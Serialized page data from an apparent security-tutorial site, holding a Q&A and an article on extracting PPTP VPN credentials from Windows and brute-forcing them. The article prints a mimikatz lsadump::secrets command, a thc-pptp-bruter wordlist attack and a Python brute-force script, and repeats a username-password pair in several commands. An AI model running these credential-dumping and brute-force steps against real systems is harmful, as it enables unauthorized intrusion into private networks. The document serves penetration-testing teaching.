[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fNq-XAD7dZeL5vpI8AL9WryCjBB9BcXFbVM_mW_aOhbs":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},505,"How can I brute-force PPTP passwords? What tools are available?","Two approaches are mentioned: using `thc-pptp-bruter` (available in Kali) for dictionary attacks, or writing a Python script that calls `pptpsetup` and checks for a `ppp0` interface after a 10-second wait to determine success. The Python method handles cases where `thc-pptp-bruter` fails. Both techniques are explained with code in [Penetration Techniques - Acquisition and Brute-Force of PPTP Passwords](\u002Fnews\u002Fpenetration-techniques-acquisition-and-brute-force-of-pptp-passwords).","\u003Cp>Two approaches are mentioned: using `thc-pptp-bruter` (available in Kali) for dictionary attacks, or writing a Python script that calls `pptpsetup` and checks for a `ppp0` interface after a 10-second wait to determine success. The Python method handles cases where `thc-pptp-bruter` fails. Both techniques are explained with code in [Penetration Techniques - Acquisition and Brute-Force of PPTP Passwords](\u002Fnews\u002Fpenetration-techniques-acquisition-and-brute-force-of-pptp-passwords).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-techniques-acquisition-and-brute-force-of-pptp-passwords\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-i-brute-force-pptp-passwords-what-tools-are-available-1777483229454","PPTP, brute-force, thc-pptp-bruter, Python script, pptpsetup",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},125,"Penetration Techniques - Acquisition and Brute-Force of PPTP Passwords","penetration-techniques-acquisition-and-brute-force-of-pptp-passwords","Learn how to acquire PPTP passwords via command line in Windows, connect to PPTP on Windows\u002FKali, and brute-force PPTP passwords using open-source tools for penetration testing.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>PPTP (Point-to-Point Tunneling Protocol) allows remote users to access corporate intranets by dialing into an ISP.\u003C\u002Fp>\u003Cp>During penetration testing, if a user's PPTP password is obtained, remote dial-in to the intranet can be achieved for further infiltration.\u003C\u002Fp>\u003Cp>This article will introduce methods for exporting PPTP configuration information and passwords via the command line, as well as an open-source script for brute-forcing PPTP passwords.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Acquiring PPTP configuration information and passwords via the command line in Windows systems\u003C\u002Fli>\u003Cli>Enabling and disabling VPN connections via the command line in Windows systems\u003C\u002Fli>\u003Cli>Methods and details for connecting to PPTP in Windows systems\u003C\u002Fli>\u003Cli>Methods and details for connecting to PPTP in Kali systems\u003C\u002Fli>\u003Cli>Details of the PPTP password brute-force script\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Acquiring PPTP Configuration Information and Passwords via the Command Line in Windows Systems\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Obtain PPTP Configuration Information\u003C\u002Fh3>\u003Cp>The configuration information for dial-up and broadband connections in Windows systems is stored in a fixed location, with the following path:\u003C\u002Fp>\u003Cp>%APPDATA%\\Microsoft\\Network\\Connections\\Pbk\\rasphone.pbk\u003C\u002Fp>\u003Cp>Viewing this file provides the PPTP connection configuration information, including the server IP, but not the connection username and password.\u003C\u002Fp>\u003Cp>The VPN connection is named VPN Connection, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017983623_0_a45c15a46e.jpeg\">\u003C\u002Fp>\u003Cp>PhoneNumber indicates the connected server IP, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017988318_1_01fbe6a7d8.jpeg\">\u003C\u002Fp>\u003Ch3>2. Obtain Internal IP\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ipconfig\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Obtain the internal IP, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017992726_2_73da3ffaee.jpeg\">\u003C\u002Fp>\u003Ch3>3. Obtain PPTP Password\u003C\u002Fh3>\u003Cp>Use the tool mimiaktz with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug token::elevate lsadump::secrets exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Obtain the connection username and password, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017996378_3_333626f3ca.jpeg\">\u003C\u002Fp>\u003Ch3>4. Connect to VPN via command line\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>rasdial \"VPN Connection\" zhaodg oZ7iFk25\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017999366_4_c212f182ea.jpeg\">\u003C\u002Fp>\u003Ch3>5. Disconnect VPN via command line\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>rasphone -h \"VPN Connection\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x03 Methods and Details for PPTP Connection on Windows System\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018003574_5_f1ad3b17ca.jpeg\">\u003C\u002Fp>\u003Cp>2.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018008875_6_d443944bc4.jpeg\">\u003C\u002Fp>\u003Cp>3.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018011900_7_b08b91bd96.jpeg\">\u003C\u002Fp>\u003Cp>4. Select to create a new connection\u003C\u002Fp>\u003Cp>5. Enter the server IP, select connect later\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018013666_8_c07d8c9780.jpeg\">\u003C\u002Fp>\u003Cp>6. Enter username and password\u003C\u002Fp>\u003Cp>7. After clicking connect, choose to skip\u003C\u002Fp>\u003Cp>Next, modify VPN properties, Security -&gt; Type of VPN, select Point to Point Tunneling Protocol (PPTP)\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018015514_9_bb151f8ad4.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>After successful creation, specifying Point to Point Tunneling Protocol (PPTP) can shorten connection waiting time\u003C\u002Fp>\u003Cp>8. Connect\u003C\u002Fp>\u003Ch2>0x04 Methods and details for PPTP connection on Kali system\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>Method 1: Through the interface\u003C\u002Fh3>\u003Cp>1. Installation\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>apt-get install network-manager-pptp network-manager-pptp-gnome\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>2.\u003C\u002Fp>\u003Cp>Settings-&gt;Network-&gt;VPN\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018017557_10_9a0fe96f7c.jpeg\">\u003C\u002Fp>\u003Cp>3.\u003C\u002Fp>\u003Cp>Identity-&gt;Advanced...\u003C\u002Fp>\u003Cp>Remove PAP, CHAP, EAP\u003C\u002Fp>\u003Cp>Select Use Point-to-Point encryption (MPPE)\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018018175_11_befa5a6060.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If unable to connect, modify the file \u002Fetc\u002FNetworkManager\u002FNetworkManager.conf\u003C\u002Fp>\u003Cp>Change managed=false to managed=true\u003C\u002Fp>\u003Cp>Restart the system\u003C\u002Fp>\u003Ch3>Method 2: via pptpsetup\u003C\u002Fh3>\u003Cp>1. Connection\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>pptpsetup --create vpn --server 5x.xxx.xxx.xx2 --username zhaodg --password oZ7iFk25 --encrypt --start\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Remote IP is 192.168.0.1, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018018873_12_cd82efea19.jpeg\">\u003C\u002Fp>\u003Cp>2. Modify routing table\u003C\u002Fp>\u003Cp>Change the default routing table to the remote IP\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>route del default\u003Cbr>route add default gw 192.168.0.1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x05 PPTP password brute force\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>PPTP server defaults to port 1723\u003C\u002Fp>\u003Ch3>1. PPTP brute forcer\u003C\u002Fh3>\u003Cp>Source code:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FBlackArch\u002Fthc-pptp-bruter\u003C\u002Fp>\u003Cp>Kali default support\u003C\u002Fp>\u003Cp>The command for dictionary brute force is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>cat wordlist | thc-pptp-bruter -u zhaodg \u003Cip>\u003C\u002Fip>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018019222_13_052bd543e4.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>PPTP is set up on CentOS\u003C\u002Fp>\u003Ch3>2. Write a Python script to implement\u003C\u002Fh3>\u003Cp>Some devices' PPTP cannot be brute-forced using PPTP brute forcer\u003C\u002Fp>\u003Cp>Therefore, attempt to use Python to call pptpsetup for implementation\u003C\u002Fp>\u003Cp>Execute commands via os.popen, test code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import os\u003Cbr>def test_vpn(ip,name,password):\u003Cbr>\tcommand = 'pptpsetup --create testvpn --server '+ip+' --username '+name+' --password '+password+' --encrypt --start'\u003Cbr>\tprint command\u003Cbr>\tvpn_status =  os.popen(command).read()\u003Cbr>\tprint vpn_status\u003Cbr>\u003Cbr>if __name__ == '__main__':\u003Cbr>\ttest_vpn('5x.xxx.xxx.xx2','zhaodg','oZ7iFk25')\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Bug encountered during testing:\u003C\u002Fp>\u003Cp>If login succeeds, the pptp process does not exit, causing script blockage and inability to obtain echo\u003C\u002Fp>\u003Cp>Only after terminating the pptp process can the echo be obtained\u003C\u002Fp>\u003Cp>Therefore, a subprocess approach is required here:\u003C\u002Fp>\u003Cp>The subprocess executes the pptpsetup command, while the parent process does not wait\u003C\u002Fp>\u003Cp>This leads to a new issue:\u003C\u002Fp>\u003Cp>How to obtain the subprocess result to determine whether login succeeded\u003C\u002Fp>\u003Cp>A simple and direct method is chosen here:\u003C\u002Fp>\u003Cp>Wait 10 seconds, then execute ifconfig. If login succeeds, a new network interface ppp0 will be created; otherwise, the current username\u002Fpassword is incorrect\u003C\u002Fp>\u003Cp>After successful login, choose to clean up the process by executing the command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>pkill pptp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Clear connection information:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>pptpsetup --delete testvpn\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>For the complete code, refer to:\u003C\u002Fp>\u003Cp>an open-source project\u003C\u002Fp>\u003Cp>The code reads the file 'wordlist' to obtain a password dictionary, attempts to connect to a specified IP, records the password upon successful connection, and clears the process and connection.\u003C\u002Fp>\u003Cp>Testing is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018019480_14_577b5f03a5.jpeg\">\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces methods for exporting PPTP configuration information and passwords via the command line, enabling the activation and deactivation of VPN connections through command-line operations.\u003C\u002Fp>\u003Cp>A practical demonstration shows how to connect to PPTP on Windows and Kali systems, concluding with the open-sourcing of a script that utilizes pptpsetup for PPTP password brute-forcing, along with an analysis of the script's implementation details.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>PPTP (Point-to-Point Tunneling Protocol) allows remote users to access corporate intranets by dialing into an ISP.\u003C\u002Fp>\u003Cp>During penetration testing, if a user's PPTP password is obtained, remote dial-in to the intranet can be achieved for further infiltration.\u003C\u002Fp>\u003Cp>This article will introduce methods for exporting PPTP configuration information and passwords via the command line, as well as an open-source script for brute-forcing PPTP passwords.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Acquiring PPTP configuration information and passwords via the command line in Windows systems\u003C\u002Fli>\u003Cli>Enabling and disabling VPN connections via the command line in Windows systems\u003C\u002Fli>\u003Cli>Methods and details for connecting to PPTP in Windows systems\u003C\u002Fli>\u003Cli>Methods and details for connecting to PPTP in Kali systems\u003C\u002Fli>\u003Cli>Details of the PPTP password brute-force script\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Acquiring PPTP Configuration Information and Passwords via the Command Line in Windows Systems\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Obtain PPTP Configuration Information\u003C\u002Fh3>\u003Cp>The configuration information for dial-up and broadband connections in Windows systems is stored in a fixed location, with the following path:\u003C\u002Fp>\u003Cp>%APPDATA%\\Microsoft\\Network\\Connections\\Pbk\\rasphone.pbk\u003C\u002Fp>\u003Cp>Viewing this file provides the PPTP connection configuration information, including the server IP, but not the connection username and password.\u003C\u002Fp>\u003Cp>The VPN connection is named VPN Connection, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017983623_0_a45c15a46e-1.jpeg\">\u003C\u002Fp>\u003Cp>PhoneNumber indicates the connected server IP, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017988318_1_01fbe6a7d8-1.jpeg\">\u003C\u002Fp>\u003Ch3>2. Obtain Internal IP\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ipconfig\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Obtain the internal IP, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017992726_2_73da3ffaee-1.jpeg\">\u003C\u002Fp>\u003Ch3>3. Obtain PPTP Password\u003C\u002Fh3>\u003Cp>Use the tool mimiaktz with the following command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug token::elevate lsadump::secrets exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Obtain the connection username and password, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017996378_3_333626f3ca-1.jpeg\">\u003C\u002Fp>\u003Ch3>4. Connect to VPN via command line\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>rasdial \"VPN Connection\" zhaodg oZ7iFk25\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017999366_4_c212f182ea-1.jpeg\">\u003C\u002Fp>\u003Ch3>5. Disconnect VPN via command line\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>rasphone -h \"VPN Connection\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x03 Methods and Details for PPTP Connection on Windows System\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>1.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018003574_5_f1ad3b17ca-1.jpeg\">\u003C\u002Fp>\u003Cp>2.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018008875_6_d443944bc4-1.jpeg\">\u003C\u002Fp>\u003Cp>3.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018011900_7_b08b91bd96-1.jpeg\">\u003C\u002Fp>\u003Cp>4. Select to create a new connection\u003C\u002Fp>\u003Cp>5. Enter the server IP, select connect later\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018013666_8_c07d8c9780-1.jpeg\">\u003C\u002Fp>\u003Cp>6. Enter username and password\u003C\u002Fp>\u003Cp>7. After clicking connect, choose to skip\u003C\u002Fp>\u003Cp>Next, modify VPN properties, Security -&gt; Type of VPN, select Point to Point Tunneling Protocol (PPTP)\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018015514_9_bb151f8ad4-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>After successful creation, specifying Point to Point Tunneling Protocol (PPTP) can shorten connection waiting time\u003C\u002Fp>\u003Cp>8. Connect\u003C\u002Fp>\u003Ch2>0x04 Methods and details for PPTP connection on Kali system\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>Method 1: Through the interface\u003C\u002Fh3>\u003Cp>1. Installation\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>apt-get install network-manager-pptp network-manager-pptp-gnome\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>2.\u003C\u002Fp>\u003Cp>Settings-&gt;Network-&gt;VPN\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018017557_10_9a0fe96f7c-1.jpeg\">\u003C\u002Fp>\u003Cp>3.\u003C\u002Fp>\u003Cp>Identity-&gt;Advanced...\u003C\u002Fp>\u003Cp>Remove PAP, CHAP, EAP\u003C\u002Fp>\u003Cp>Select Use Point-to-Point encryption (MPPE)\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018018175_11_befa5a6060-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If unable to connect, modify the file \u002Fetc\u002FNetworkManager\u002FNetworkManager.conf\u003C\u002Fp>\u003Cp>Change managed=false to managed=true\u003C\u002Fp>\u003Cp>Restart the system\u003C\u002Fp>\u003Ch3>Method 2: via pptpsetup\u003C\u002Fh3>\u003Cp>1. Connection\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>pptpsetup --create vpn --server 5x.xxx.xxx.xx2 --username zhaodg --password oZ7iFk25 --encrypt --start\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Remote IP is 192.168.0.1, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018018873_12_cd82efea19-1.jpeg\">\u003C\u002Fp>\u003Cp>2. Modify routing table\u003C\u002Fp>\u003Cp>Change the default routing table to the remote IP\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>route del default\u003Cbr>route add default gw 192.168.0.1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x05 PPTP password brute force\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>PPTP server defaults to port 1723\u003C\u002Fp>\u003Ch3>1. PPTP brute forcer\u003C\u002Fh3>\u003Cp>Source code:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FBlackArch\u002Fthc-pptp-bruter\u003C\u002Fp>\u003Cp>Kali default support\u003C\u002Fp>\u003Cp>The command for dictionary brute force is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>cat wordlist | thc-pptp-bruter -u zhaodg \u003Cip>\u003C\u002Fip>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018019222_13_052bd543e4-1.jpeg\">\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>PPTP is set up on CentOS\u003C\u002Fp>\u003Ch3>2. Write a Python script to implement\u003C\u002Fh3>\u003Cp>Some devices' PPTP cannot be brute-forced using PPTP brute forcer\u003C\u002Fp>\u003Cp>Therefore, attempt to use Python to call pptpsetup for implementation\u003C\u002Fp>\u003Cp>Execute commands via os.popen, test code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import os\u003Cbr>def test_vpn(ip,name,password):\u003Cbr>\tcommand = 'pptpsetup --create testvpn --server '+ip+' --username '+name+' --password '+password+' --encrypt --start'\u003Cbr>\tprint command\u003Cbr>\tvpn_status =  os.popen(command).read()\u003Cbr>\tprint vpn_status\u003Cbr>\u003Cbr>if __name__ == '__main__':\u003Cbr>\ttest_vpn('5x.xxx.xxx.xx2','zhaodg','oZ7iFk25')\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Bug encountered during testing:\u003C\u002Fp>\u003Cp>If login succeeds, the pptp process does not exit, causing script blockage and inability to obtain echo\u003C\u002Fp>\u003Cp>Only after terminating the pptp process can the echo be obtained\u003C\u002Fp>\u003Cp>Therefore, a subprocess approach is required here:\u003C\u002Fp>\u003Cp>The subprocess executes the pptpsetup command, while the parent process does not wait\u003C\u002Fp>\u003Cp>This leads to a new issue:\u003C\u002Fp>\u003Cp>How to obtain the subprocess result to determine whether login succeeded\u003C\u002Fp>\u003Cp>A simple and direct method is chosen here:\u003C\u002Fp>\u003Cp>Wait 10 seconds, then execute ifconfig. If login succeeds, a new network interface ppp0 will be created; otherwise, the current username\u002Fpassword is incorrect\u003C\u002Fp>\u003Cp>After successful login, choose to clean up the process by executing the command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>pkill pptp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Clear connection information:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>pptpsetup --delete testvpn\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>For the complete code, refer to:\u003C\u002Fp>\u003Cp>an open-source project\u003C\u002Fp>\u003Cp>The code reads the file 'wordlist' to obtain a password dictionary, attempts to connect to a specified IP, records the password upon successful connection, and clears the process and connection.\u003C\u002Fp>\u003Cp>Testing is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018019480_14_577b5f03a5-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces methods for exporting PPTP configuration information and passwords via the command line, enabling the activation and deactivation of VPN connections through command-line operations.\u003C\u002Fp>\u003Cp>A practical demonstration shows how to connect to PPTP on Windows and Kali systems, concluding with the open-sourcing of a script that utilizes pptpsetup for PPTP password brute-forcing, along with an analysis of the script's implementation details.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1078,"Onedaysec",4,"published","2026-02-02T07:51:00.064Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"PPTP Password Acquisition & Brute-Force Techniques for Penetration Testing","PPTP password brute-force, penetration testing, VPN security, Windows PPTP, Kali PPTP, mimikatz, thc-pptp-bruter, network infiltration",null,false,[],{"docs":43,"hasNextPage":40},[44,4,45,46],506,504,503,{"title":39,"description":39,"image":39},"2026-07-24T15:37:12.998Z","2026-07-23T16:01:40.268Z","draft","2026-07-23T16:12:50.072Z"]